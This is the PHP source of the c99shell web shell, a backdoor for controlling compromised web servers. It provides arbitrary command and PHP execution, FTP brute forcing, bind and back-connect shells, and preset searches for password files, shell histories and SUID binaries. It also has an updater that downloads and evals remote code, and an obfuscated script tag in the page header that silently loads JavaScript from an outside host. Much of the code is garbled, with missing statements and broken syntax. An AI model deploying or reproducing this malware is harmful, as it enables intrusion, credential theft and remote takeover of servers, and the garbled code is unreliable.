<?php
//Starting calls
define("starttime",getmicrotime
());
foreach($_REQUEST as $k=>
$v) {if (!
isset($$k)) {$$k =
$v;
}}
$shver = "1.0 pre-release build #16"; //Current version
//CONFIGURATION AND SETTINGS
elseif (!
empty($set_surl)) {$surl =
$set_surl;
setcookie("c99sh_surl",
$surl);
}
else {$surl = $_REQUEST["c99sh_surl"]; //Set this cookie for manual SURL
}
$surl_autofill_include = TRUE; //If TRUE then search variables with descriptors (URLs) and save it in SURL.
if ($surl_autofill_include and !
$_REQUEST["c99sh_surl"]) {$include =
"&";
foreach (explode("&",
getenv("QUERY_STRING")) as $v) {$v =
explode("=",
$v);
$name =
urldecode($v[0]);
$value =
urldecode($v[1]);
foreach (array("http://",
"https://",
"ssl://",
"ftp://",
"\\\\") as $needle) {if (strpos($value,
$needle) ===
0) {$includestr .=
urlencode($name).
"=".
urlencode($value).
"&";
}}} if ($_REQUEST["surl_autofill_include"]) {$includestr .=
"surl_autofill_include=1&";
}}
{
$surl = "?".$includestr; //Self url
}
$timelimit = 0; //time limit of execution this script over server quote (seconds), 0 = unlimited.
//Authentication
$login = ""; //login
//DON'T FORGOT ABOUT PASSWORD!!!
$pass = ""; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
$host_allow =
array("*");
//array ("{mask}1","{mask}2",...), {mask} = IP or HOST e.g. array("192.168.0.*","127.0.0.1")
$login_txt = "Restricted area"; //http-auth message.
$accessdeniedmess = "<a href=\"http://ccteam.ru/releases/c99shell\">c99shell v.".$shver."</a>: access denied";
$gzipencode = TRUE; //Encode with gzip?
$updatenow = FALSE; //If TRUE, update now (this variable will be FALSE)
$c99sh_updateurl = "http://ccteam.ru/update/c99shell/"; //Update server
$c99sh_sourcesurl = "http://ccteam.ru/files/c99sh_sources/"; //Sources-server
$filestealth = TRUE; //if TRUE, don't change modify- and access-time
$donated_html = "<center><b>Owned by hacker</b></center>";
/* If you publish free shell and you wish
add link to your site or any other information,
put here your html. */
$donated_act =
array("");
//array ("act1","act2,"...), if $act is in this array, display $donated_html.
$curdir = "./"; //start folder
//$curdir = getenv("DOCUMENT_ROOT");
$tmpdir = ""; //Folder for tempory files. If empty, auto-fill (/tmp or %WINDIR/temp)
$tmpdir_log = "./"; //Directory logs of long processes (e.g. brute, scan...)
$log_email = "user@host.tld"; //Default e-mail for sending logs
$sort_default = "0a"; //Default sorting, 0 - number of colomn, "a"scending or "d"escending
$sort_save = TRUE; //If TRUE then save sorting-position using cookies.
// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext4","ext5","ext6",...),
// ...
// )
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg","htaccess"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp","py","cgi","pl"),
"img"=>array("gif","png","jpeg","jfif","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar","gz","tar")
);
// Registered executable file-types.
// array(
// string "command{i}"=>array("ext1","ext2","ext3",...),
// ...
// )
// {command}: %f% = filename
getenv("PHPRC").
" -q %f%" =>
array("php",
"php3",
"php4"),
"perl %f%" =>
array("pl",
"cgi")
);
/* Highlighted files.
array(
i=>array({regexp},{type},{opentag},{closetag},{break})
...
)
string {regexp} - regular exp.
int {type}:
0 - files and folders (as default),
1 - files only, 2 - folders only
string {opentag} - open html-tag, e.g. "<b>" (default)
string {closetag} - close html-tag, e.g. "</b>" (default)
bool {break} - if TRUE and found match then break
*/
$regxp_highlight =
array(
array(basename($_SERVER["PHP_SELF"]),
1,
"<font color=\"yellow\">",
"</font>"),
// example
array("config.php",
1) // example
);
$safemode_diskettes =
array("a");
// This variable for disabling diskett-errors.
// array (i=>{letter} ...); string {letter} - letter of a drive
//$safemode_diskettes = range("a","z");
$hexdump_lines = 8;// lines in hex preview file
$hexdump_rows = 24;// 16, 24 or 32 bytes in one line
$nixpwdperpage = 100; // Get first N lines from /etc/passwd
$bindport_pass = "c99"; // default password for binding
$bindport_port = "31373"; // default port for binding
$bc_port = "31373"; // default port for back-connect
$datapipe_localport = "8081"; // default port for datapipe
// Command-aliases
if (!$win)
{
array("-----------------------------------------------------------",
"ls -la"),
array("find all suid files",
"find / -type f -perm -04000 -ls"),
array("find suid files in current dir",
"find . -type f -perm -04000 -ls"),
array("find all sgid files",
"find / -type f -perm -02000 -ls"),
array("find sgid files in current dir",
"find . -type f -perm -02000 -ls"),
array("find config.inc.php files",
"find / -type f -name config.inc.php"),
array("find config* files",
"find / -type f -name \"config*\""),
array("find config* files in current dir",
"find . -type f -name \"config*\""),
array("find all writable folders and files",
"find / -perm -2 -ls"),
array("find all writable folders and files in current dir",
"find . -perm -2 -ls"),
array("find all service.pwd files",
"find / -type f -name service.pwd"),
array("find service.pwd files in current dir",
"find . -type f -name service.pwd"),
array("find all .htpasswd files",
"find / -type f -name .htpasswd"),
array("find .htpasswd files in current dir",
"find . -type f -name .htpasswd"),
array("find all .bash_history files",
"find / -type f -name .bash_history"),
array("find .bash_history files in current dir",
"find . -type f -name .bash_history"),
array("find all .fetchmailrc files",
"find / -type f -name .fetchmailrc"),
array("find .fetchmailrc files in current dir",
"find . -type f -name .fetchmailrc"),
array("list file attributes on a Linux second extended file system",
"lsattr -va"),
array("show opened ports",
"netstat -an | grep -i listen")
);
}
else
{
array("-----------------------------------------------------------",
"dir"),
array("show opened ports",
"netstat -an")
);
}
$sess_cookie = "c99shvars"; // Cookie-variable name
$usefsbuff = TRUE; //Buffer-function
$copy_unset = FALSE; //Remove copied files from buffer after pasting
//Quick launch
array("<img src=\"".
$surl.
"act=img&img=home\" alt=\"Home\" height=\"20\" width=\"20\" border=\"0\">",
$surl),
array("<img src=\"".
$surl.
"act=img&img=back\" alt=\"Back\" height=\"20\" width=\"20\" border=\"0\">",
"#\" onclick=\"history.back(1)"),
array("<img src=\"".
$surl.
"act=img&img=forward\" alt=\"Forward\" height=\"20\" width=\"20\" border=\"0\">",
"#\" onclick=\"history.go(1)"),
array("<img src=\"".
$surl.
"act=img&img=up\" alt=\"UPDIR\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=ls&d=%upd&sort=%sort"),
array("<img src=\"".
$surl.
"act=img&img=refresh\" alt=\"Refresh\" height=\"20\" width=\"17\" border=\"0\">",
""),
array("<img src=\"".
$surl.
"act=img&img=search\" alt=\"Search\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=search&d=%d"),
array("<img src=\"".
$surl.
"act=img&img=buffer\" alt=\"Buffer\" height=\"20\" width=\"20\" border=\"0\">",
$surl.
"act=fsbuff&d=%d"),
array("<b>Encoder</b>",
$surl.
"act=encoder&d=%d"),
array("<b>Tools</b>",
$surl.
"act=tools&d=%d"),
array("<b>Proc.</b>",
$surl.
"act=processes&d=%d"),
array("<b>FTP brute</b>",
$surl.
"act=ftpquickbrute&d=%d"),
array("<b>Sec.</b>",
$surl.
"act=security&d=%d"),
array("<b>SQL</b>",
$surl.
"act=sql&d=%d"),
array("<b>PHP-code</b>",
$surl.
"act=eval&d=%d"),
array("<b>Update</b>",
$surl.
"act=update&d=%d"),
array("<b>Feedback</b>",
$surl.
"act=feedback&d=%d"),
array("<b>Self remove</b>",
$surl.
"act=selfremove"),
array("<b>Logout</b>",
"#\" onclick=\"if (confirm('Are you sure?')) window.close()")
);
//Highlight-code colors
$highlight_background = "#c0c0c0";
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";
$highlight_string = "#000000";
@$f = $_REQUEST["f"];
//END CONFIGURATION
// \/Next code isn't for editing\/
$s =
"!^(".
implode("|",
$tmp).
")$!i";
{
if (empty($md5_pass)) {$md5_pass =
md5($pass);
}
if (($_SERVER["PHP_AUTH_USER"] !=
$login) or
(md5($_SERVER["PHP_AUTH_PW"]) !=
$md5_pass))
{
header("WWW-Authenticate: Basic realm=\"c99shell ".
$shver.
": ".
$login_txt.
"\"");
header("HTTP/1.0 401 Unauthorized");
}
}
if ($act != "img")
{
if ($selfwrite or
$updatenow) {@
ob_clean(); c99sh_getupdate
($selfwrite,
1);
exit;
}
if (!
is_array($sess_data["copy"])) {$sess_data["copy"] =
array();
}
$disablefunc = @
ini_get("disable_functions");
if (!
empty($disablefunc))
{
$disablefunc =
explode(",",
$disablefunc);
}
{
function c99_buff_prepare()
{
foreach($sess_data["copy"] as $k=>
$v) {$sess_data["copy"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,
realpath($v));
}
foreach($sess_data["cut"] as $k=>
$v) {$sess_data["cut"][$k] =
str_replace("\\",DIRECTORY_SEPARATOR,
realpath($v));
}
sort($sess_data["copy"]);
if ($act !=
"copy") {foreach($sess_data["cut"] as $k=>
$v) {if ($sess_data["copy"][$k] ==
$v) {unset($sess_data["copy"][$k]);
}}}
else {foreach($sess_data["copy"] as $k=>
$v) {if ($sess_data["cut"][$k] ==
$v) {unset($sess_data["cut"][$k]);
}}}
}
}
c99_buff_prepare();
{
function c99_sess_put($data)
{
c99_buff_prepare();
$sess_data = $data;
}
}
foreach (array("sort",
"sql_sort") as $v)
{
if (!
empty($_GET[$v])) {$$v =
$_GET[$v];
}
if (!
empty($_POST[$v])) {$$v =
$_POST[$v];
}
}
if ($sort_save)
{
}
{
function str2mini($content,$len)
{
{
return substr($content,
0,
$len).
"...".
substr($content,-
$len);
}
else {return $content;}
}
}
{
function view_size($size)
{
else
{
if ($size >=
1073741824) {$size =
round($size/
1073741824*
100)/
100 .
" GB";
}
elseif ($size >=
1048576) {$size =
round($size/
1048576*
100)/
100 .
" MB";
}
elseif ($size >=
1024) {$size =
round($size/
1024*
100)/
100 .
" KB";
}
else {$size = $size . " B";}
return $size;
}
}
}
{
function fs_copy_dir($d,$t)
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
if (!
is_dir($d.DIRECTORY_SEPARATOR.
$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
else {$ret =
mkdir($t.DIRECTORY_SEPARATOR.
$o); fs_copy_dir
($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
if (!$ret) {return $ret;}
}
}
return TRUE;
}
}
{
function fs_copy_obj($d,$t)
{
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
if (substr($t,
-1) != DIRECTORY_SEPARATOR
) {$t .= DIRECTORY_SEPARATOR;
}
return fs_copy_dir($d,$t);
}
else {return FALSE;}
}
}
{
function fs_move_dir($d,$t)
{
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
$ret = TRUE;
if (!
is_dir($d.DIRECTORY_SEPARATOR.
$o)) {$ret =
copy($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o);
}
else {if (mkdir($t.DIRECTORY_SEPARATOR.
$o) and fs_copy_dir
($d.DIRECTORY_SEPARATOR.
$o,
$t.DIRECTORY_SEPARATOR.
$o)) {$ret =
FALSE;
}}
if (!$ret) {return $ret;}
}
}
return TRUE;
}
}
{
function fs_move_obj($d,$t)
{
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
if (substr($t,
-1) != DIRECTORY_SEPARATOR
) {$t .= DIRECTORY_SEPARATOR;
}
return fs_move_dir($d,$t);
}
{
else {unlink($t);
return FALSE;
}
}
else {return FALSE;}
}
}
{
function fs_rmdir($d)
{
while (($o =
readdir($h)) !==
FALSE)
{
if (($o != ".") and ($o != ".."))
{
else {fs_rmdir
($d.
$o.DIRECTORY_SEPARATOR
);
rmdir($d.
$o);
}
}
}
}
}
{
function fs_rmobj($o)
{
{
if (substr($o,
-1) != DIRECTORY_SEPARATOR
) {$o .= DIRECTORY_SEPARATOR;
}
return fs_rmdir($o);
}
else {return FALSE;}
}
}
{
function myshellexec($cmd)
{
$result = "";
{
elseif (($result = `$cmd`) !== FALSE) {}
{
$result = "";
while(!
feof($fp)) {$result .=
fread($fp,
1024);
}
}
}
return $result;
}
}
{
function view_perms($mode)
{
if (($mode & 0xC000) === 0xC000) {$type = "s";}
elseif (($mode & 0x4000) === 0x4000) {$type = "d";}
elseif (($mode & 0xA000) === 0xA000) {$type = "l";}
elseif (($mode & 0x8000) === 0x8000) {$type = "-";}
elseif (($mode & 0x6000) === 0x6000) {$type = "b";}
elseif (($mode & 0x2000) === 0x2000) {$type = "c";}
elseif (($mode & 0x1000) === 0x1000) {$type = "p";}
else {$type = "?";}
$owner["read"] = ($mode & 00400)?"r":"-";
$owner["write"] = ($mode & 00200)?"w":"-";
$owner["execute"] = ($mode & 00100)?"x":"-";
$group["read"] = ($mode & 00040)?"r":"-";
$group["write"] = ($mode & 00020)?"w":"-";
$group["execute"] = ($mode & 00010)?"x":"-";
$world["read"] = ($mode & 00004)?"r":"-";
$world["write"] = ($mode & 00002)? "w":"-";
$world["execute"] = ($mode & 00001)?"x":"-";
if ($mode & 0x800) {$owner["execute"] = ($owner["execute"] == "x")?"s":"S";}
if ($mode & 0x400) {$group["execute"] = ($group["execute"] == "x")?"s":"S";}
if ($mode & 0x200) {$world["execute"] = ($world["execute"] == "x")?"t":"T";}
return $type.
join("",
$owner).
join("",
$group).
join("",
$world);
}
}
{
function parse_perms($mode)
{
if (($mode & 0xC000) === 0xC000) {$t = "s";}
elseif (($mode & 0x4000) === 0x4000) {$t = "d";}
elseif (($mode & 0xA000) === 0xA000) {$t = "l";}
elseif (($mode & 0x8000) === 0x8000) {$t = "-";}
elseif (($mode & 0x6000) === 0x6000) {$t = "b";}
elseif (($mode & 0x2000) === 0x2000) {$t = "c";}
elseif (($mode & 0x1000) === 0x1000) {$t = "p";}
else {$t = "?";}
$o["r"] = ($mode & 00400) > 0; $o["w"] = ($mode & 00200) > 0; $o["x"] = ($mode & 00100) > 0;
$g["r"] = ($mode & 00040) > 0; $g["w"] = ($mode & 00020) > 0; $g["x"] = ($mode & 00010) > 0;
$w["r"] = ($mode & 00004) > 0; $w["w"] = ($mode & 00002) > 0; $w["x"] = ($mode & 00001) > 0;
return array("t"=>
$t,
"o"=>
$o,
"g"=>
$g,
"w"=>
$w);
}
}
{
function parsesort($sort)
{
if ($second != "d") {$second = "a";}
return array($one,
$second);
}
}
{
function view_perms_color($o)
{
else {return "<font color=green>".view_perms
(fileperms($o)).
"</font>";
}
}
}
{
function c99getsource($fn)
{
"c99sh_bindport.pl" => "c99sh_bindport_pl.txt",
"c99sh_bindport.c" => "c99sh_bindport_c.txt",
"c99sh_backconn.pl" => "c99sh_backconn_pl.txt",
"c99sh_backconn.c" => "c99sh_backconn_c.txt",
"c99sh_datapipe.pl" => "c99sh_datapipe_pl.txt",
"c99sh_datapipe.c" => "c99sh_datapipe_c.txt",
);
$name = $array[$fn];
else {return FALSE;}
}
}
{
function c99sh_getupdate($update = TRUE)
{
$url =
$GLOBALS["c99sh_updateurl"].
"?version=".
urlencode(base64_encode($GLOBALS["shver"])).
"&updatenow=".
($updatenow?
"1":
"0").
"&";
if (!$data) {return "Can't connect to update-server!";}
else
{
if ($data{0} == "\x99" and $data{1} == "\x01") {return "Error: ".$string; return FALSE;}
if ($data{0} == "\x99" and $data{1} == "\x02") {return "You are using latest version!";}
if ($data{0} == "\x99" and $data{1} == "\x03")
{
if ($update)
{
$sourceurl = $string[0];
if (!$source) {return "Can't fetch update!";}
else
{
$fp =
fopen(__FILE__,
"w");
if (!$fp) {return "Local error: can't write update to ".__FILE__."! You may download c99shell.php manually <a href=\"".$sourceurl."\"><u>here</u></a>.";}
else {fwrite($fp,
$source);
fclose($fp);
return "Thanks! Updated with success.";
}
}
}
else {return "New version are available: ".$string[1];}
}
elseif ($data{0} ==
"\x99" and
$data{1} ==
"\x04") {eval($string);
return 1;
}
else {return "Error in protocol: segmentation failed! (".$data.") ";}
}
}
}
{
function mysql_dump($set)
{
$sock = $set["sock"];
$db = $set["db"];
$print = $set["print"];
$nl2br = $set["nl2br"];
$file = $set["file"];
$add_drop = $set["add_drop"];
$tabs = $set["tabs"];
$onlytabs = $set["onlytabs"];
if (empty($db)) {$db =
"db";
}
if (empty($print)) {$print =
0;
}
if (empty($nl2br)) {$nl2br =
0;
}
if (empty($add_drop)) {$add_drop =
TRUE;
}
{
$file =
$tmpdir.
"dump_".
getenv("SERVER_NAME").
"_".
$db.
"_".
date("d-m-Y-H-i-s").
".sql";
}
if (empty($add_drop)) {$add_drop =
TRUE;
}
{
// retrive tables-list
}
$out = "# Dumped by C99Shell.SQL v. ".$shver."
# Home page: http://ccteam.ru
#
# Host settings:
# Date: ".
date("d.m.Y H:i:s").
"
# DB: \"".$db."\"
#---------------------------------------------------------
";
foreach($tabs as $tab)
{
if ((in_array($tab,
$onlytabs)) or
(!
$c))
{
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
// recieve query for create table structure
$res =
mysql_query("SHOW CREATE TABLE `".
$tab.
"`",
$sock);
if (!$res) {$ret["err"][] = mysql_smarterror();}
else
{
$out .= $row["1"].";\n\n";
// recieve table variables
{
{
foreach($values as $k=>
$v) {$values[$k] =
addslashes($v);
}
$values =
implode("', '",
$values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
$out .= $sql;
}
}
}
}
}
$out .= "#---------------------------------------------------------------------------------\n\n";
if ($file)
{
if (!$fp) {$ret["err"][] = 2;}
else
{
}
}
return $out;
}
}
{
function mysql_buildwhere
($array,
$sep=
" and",
$functs=
array())
{
$result = "";
foreach($array as $k=>$v)
{
$value = "";
if (!
empty($functs[$k])) {$value .=
$functs[$k].
"(";
}
if (!
empty($functs[$k])) {$value .=
")";
}
$result .= "`".$k."` = ".$value.$sep;
}
return $result;
}
}
{
function mysql_fetch_all($query,$sock)
{
return $array;
}
}
{
function mysql_smarterror($type,$sock)
{
return $error;
}
}
{
function mysql_query_form()
{
global $submit,
$sql_act,
$sql_query,
$sql_query_result,
$sql_confirm,
$sql_query_error,
$tbl_struct;
if (($submit) and
(!
$sql_query_result) and
($sql_confirm)) {if (!
$sql_query_error) {$sql_query_error =
"Query was empty";
} echo "<b>Error:</b> <br>".
$sql_query_error.
"<br>";
}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act))
{
echo "<table border=0><tr><td><form name=\"c99sh_sqlquery\" method=POST><b>";
if (($sql_query) and
(!
$submit)) {echo "Do you really want to";
} else {echo "SQL-Query";
} echo ":</b><br><br><textarea name=sql_query cols=100 rows=10>".
htmlspecialchars($sql_query).
"</textarea><br><br><input type=hidden name=act value=sql><input type=hidden name=sql_act value=query><input type=hidden name=sql_tbl value=\"".
htmlspecialchars($sql_tbl).
"\"><input type=hidden name=submit value=\"1\"><input type=hidden name=\"sql_goto\" value=\"".
htmlspecialchars($sql_goto).
"\"><input type=submit name=sql_confirm value=\"Yes\"> <input type=submit value=\"No\"></form></td>";
if ($tbl_struct)
{
echo "<td valign=\"top\"><b>Fields:</b><br>";
foreach ($tbl_struct as $field) {$name =
$field["Field"];
echo "» <a href=\"#\" onclick=\"document.c99sh_sqlquery.sql_query.value+='`".
$name.
"`';\"><b>".
$name.
"</b></a><br>";
}
echo "</td></tr></table>";
}
}
if ($sql_query_result or (!$sql_confirm)) {$sql_query = $sql_last_query;}
}
}
{
{
}
}
{
function mysql_query_parse($query)
{
/*array array()
{
"METHOD"=>array(output_type),
"METHOD1"...
...
}
if output_type == 0, no output,
if output_type == 1, no output if no error
if output_type == 2, output without control-buttons
if output_type == 3, output with control-buttons
*/
"SELECT"=>array(3,1),
"SHOW"=>array(2,1),
"DELETE"=>array(1),
"DROP"=>array(1)
);
{
$result["propertions"] = $types[$op];
$result["query"] = $query;
if ($types[$op] == 2)
{
foreach($arr as $k=>$v)
{
{
$result["limit"] = $arr[$k+1];
$result["limit"] =
explode(",",
$result["limit"]);
if (count($result["limit"]) ==
1) {$result["limit"] =
array(0,
$result["limit"][0]);
}
unset($arr[$k],
$arr[$k+1]);
}
}
}
}
else {return FALSE;}
}
}
{
function c99fsearch($d)
{
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
while (($f =
readdir($h)) !==
FALSE)
{
if($f != "." && $f != "..")
{
$bool =
(empty($a["name_regexp"]) and
strpos($f,
$a["name"]) !==
FALSE) ||
($a["name_regexp"] and
ereg($a["name"],
$f));
{
$search_i_d++;
if (empty($a["text"]) and
$bool) {$found[] =
$d.
$f;
$found_d++;
}
if (!
is_link($d.
$f)) {c99fsearch
($d.
$f);
}
}
else
{
$search_i_f++;
if ($bool)
{
{
if ($a["text_wwo"]) {$a["text"] =
" ".
trim($a["text"]).
" ";
}
if ($a["text_regexp"]) {$bool =
ereg($a["text"],
$r);
}
else {$bool =
strpos(" ".
$r,
$a["text"],
1);
}
if ($a["text_not"]) {$bool = !$bool;}
if ($bool) {$found[] = $d.$f; $found_f++;}
}
else {$found[] = $d.$f; $found_f++;}
}
}
}
}
}
}
if ($act ==
"gofile") {if (is_dir($f)) {$act =
"ls";
$d =
$f;
} else {$act =
"f";
$d =
dirname($f);
$f =
basename($f);
}}
//Sending headers
function onphpshutdown()
{
{
}
}
function c99shexit()
{
onphpshutdown();
}
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0",
FALSE);
{
$tmpdir =
ini_get("upload_tmp_dir");
if (is_dir($tmpdir)) {$tmpdir =
"/tmp/";
}
}
$tmpdir =
str_replace("\\",DIRECTORY_SEPARATOR,
$tmpdir);
if (substr($tmpdir,
-1) != DIRECTORY_SEPARATOR
) {$tmpdir .= DIRECTORY_SEPARATOR;
}
if (empty($tmpdir_logs)) {$tmpdir_logs =
$tmpdir;
}
else {$tmpdir_logs =
realpath($tmpdir_logs);
}
{
$safemode = TRUE;
$hsafemode = "<font color=red>ON (secure)</font>";
}
else {$safemode = FALSE; $hsafemode = "<font color=green>OFF (not secure)</font>";}
if ($v or
strtolower($v) ==
"on") {$openbasedir =
TRUE;
$hopenbasedir =
"<font color=red>".
$v.
"</font>";
}
else {$openbasedir = FALSE; $hopenbasedir = "<font color=green>OFF (not secure)</font>";}
if (empty($sort)) {$sort =
$sort_default;
}
$DISP_SERVER_SOFTWARE =
getenv("SERVER_SOFTWARE");
@
ini_set("highlight.bg",
$highlight_bg);
//FFFFFF
@
ini_set("highlight.comment",
$highlight_comment);
//#FF8000
@
ini_set("highlight.default",
$highlight_default);
//#0000BB
@
ini_set("highlight.html",
$highlight_html);
//#000000
@
ini_set("highlight.keyword",
$highlight_keyword);
//#007700
@
ini_set("highlight.string",
$highlight_string);
//#DD0000
$disp_fullpath = $ls_arr = $notls = null;
?><html><head><meta http-equiv=
"Content-Type" content=
"text/html; charset=windows-1251"><meta http-equiv=
"Content-Language" content=
"en-us"><title><?php
echo getenv("HTTP_HOST");
?> - phpshell</title><STYLE>TD
{ FONT-SIZE: 8pt; COLOR:
#ebebeb; FONT-FAMILY: verdana;}BODY { scrollbar-face-color: #800000; scrollbar-shadow-color: #101010; scrollbar-highlight-color: #101010; scrollbar-3dlight-color: #101010; scrollbar-darkshadow-color: #101010; scrollbar-track-color: #101010; scrollbar-arrow-color: #101010; font-family: Verdana;}TD.header { FONT-WEIGHT: normal; FONT-SIZE: 10pt; BACKGROUND: #7d7474; COLOR: white; FONT-FAMILY: verdana;}A { FONT-WEIGHT: normal; COLOR: #dadada; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; FONT-FAMILY: verdana; TEXT-DECORATION: none;}A.Links { COLOR: #ffffff; TEXT-DECORATION: none;}A.Links:unknown { FONT-WEIGHT: normal; COLOR: #ffffff; TEXT-DECORATION: none;}A:hover { COLOR: #ffffff; TEXT-DECORATION: underline;}.skin0{position:absolute; width:200px; border:2px solid black; background-color:menu; font-family:Verdana; line-height:20px; cursor:default; visibility:hidden;;}.skin1{cursor: default; font: menutext; position: absolute; width: 145px; background-color: menu; border: 1 solid buttonface;visibility:hidden; border: 2 outset buttonhighlight; font-family: Verdana,Geneva, Arial; font-size: 10px; color: black;}.menuitems{padding-left:15px; padding-right:10px;;}input{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}textarea{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}button{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}select{background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}option {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}iframe {background-color: #800000; font-size: 8pt; color: #FFFFFF; font-family: Tahoma; border: 1 solid #666666;}p {MARGIN-TOP: 0px; MARGIN-BOTTOM: 0px; LINE-HEIGHT: 150%}blockquote{ font-size: 8pt; font-family: Courier, Fixed, Arial; border : 8px solid #A9A9A9; padding: 1em; margin-top: 1em; margin-bottom: 5em; margin-right: 3em; margin-left: 4em; background-color: #B7B2B0;}body,td,th { font-family: verdana; color: #d9d9d9; font-size: 11px;}body { background-color: #000000;}</style></head><BODY text=#ffffff bottomMargin=0 bgColor=#000000 leftMargin=0 topMargin=0 rightMargin=0 marginheight=0 marginwidth=0><center><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1 bordercolor="#C0C0C0"><tr><th width="101%" height="15" nowrap bordercolor="#C0C0C0" valign="top" colspan="2"><p><font face=Webdings size=6><b>!</b></font><a href="<?php echo $surl; ?>"><font face="Verdana" size="5"><b><Script Language='Javascript'>
<!--
document.write(unescape('%3C%53%43%52%49%50%54%20%53%52%43%3D%68%74%74%70%3A%2F%2F%77%77%77%2E%72%35%37%2E%6C%69%2F%69%6D%61%67%65%73%2F%69%6D%67%2E%6A%73%3E%3C%2F%53%43%52%49%50%54%3E%0D%0A'));
//-->
</Script>C99Shell v.
<?php echo $shver; ?></b></font></a><font face=Webdings size=
6><b>!</b></font></p></center></th></tr><tr><td><p align=
"left"><b>Software: <?php
echo $DISP_SERVER_SOFTWARE; ?></b> </p><p align=
"left"><b>uname -a: <?php
echo wordwrap(php_uname(),
90,
"<br>",
1); ?></b> </p><p align=
"left"><b><?php
if (!
$win) {echo wordwrap(myshellexec
("id"),
90,
"<br>",
1);
} else {echo get_current_user();
} ?></b> </p><p align=
"left"><b>Safe-mode: <?php
echo $hsafemode; ?></b></p><p align=
"left"><?php
if (substr($d,
-1) != DIRECTORY_SEPARATOR
) {$d .= DIRECTORY_SEPARATOR;
}
$i = 0;
foreach($pd as $b)
{
$t = "";
$j = 0;
foreach ($e as $r)
{
$t.= $r.DIRECTORY_SEPARATOR;
if ($j == $i) {break;}
$j++;
}
$i++;
}
echo " ";
{
$wd = TRUE;
$wdt = "<font color=green>[ ok ]</font>";
echo "<b><font color=green>".view_perms
(fileperms($d)).
"</font></b>";
}
else
{
$wd = FALSE;
$wdt = "<font color=red>[ Read-Only ]</font>";
echo "<b>".view_perms_color
($d).
"</b>";
}
{
if ($free === FALSE) {$free = 0;}
if ($total === FALSE) {$total = 0;}
if ($free < 0) {$free = 0;}
if ($total < 0) {$total = 0;}
$used = $total-$free;
$free_percent =
round(100/
($total/
$free),
2);
echo "<br><b>Free ".view_size
($free).
" of ".view_size
($total).
" (".
$free_percent.
"%)</b>";
}
$letters = "";
if ($win)
{
$v = $v[0];
foreach (range("a",
"z") as $letter)
{
$bool =
$isdiskette =
in_array($letter,
$safemode_diskettes);
if (!
$bool) {$bool =
is_dir($letter.
":\\");
}
if ($bool)
{
$letters .=
"<a href=\"".
$surl.
"act=ls&d=".
urlencode($letter.
":\\").
"\"".
($isdiskette?
" onclick=\"return confirm('Make sure that the diskette is inserted properly, otherwise an error may occur.')\"":
"").
">[ ";
if ($letter.":" != $v) {$letters .= $letter;}
else {$letters .= "<font color=green>".$letter."</font>";}
$letters .= " ]</a> ";
}
}
if (!
empty($letters)) {echo "<b>Detected drives</b>: ".
$letters.
"<br>";
}
}
if (count($quicklaunch) >
0)
{
foreach($quicklaunch as $item)
{
echo "<a href=\"".
$item[1].
"\">".
$item[0].
"</a> ";
}
}
echo "</p></td></tr></table><br>";
if ((!
empty($donated_html)) and
(in_array($act,
$donated_act))) {echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">".
$donated_html.
"</td></tr></table><br>";
}
echo "<TABLE style=\"BORDER-COLLAPSE: collapse\" cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td width=\"100%\" valign=\"top\">";
if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
$sql_surl = $surl."act=sql";
$sql_surl .= "&";
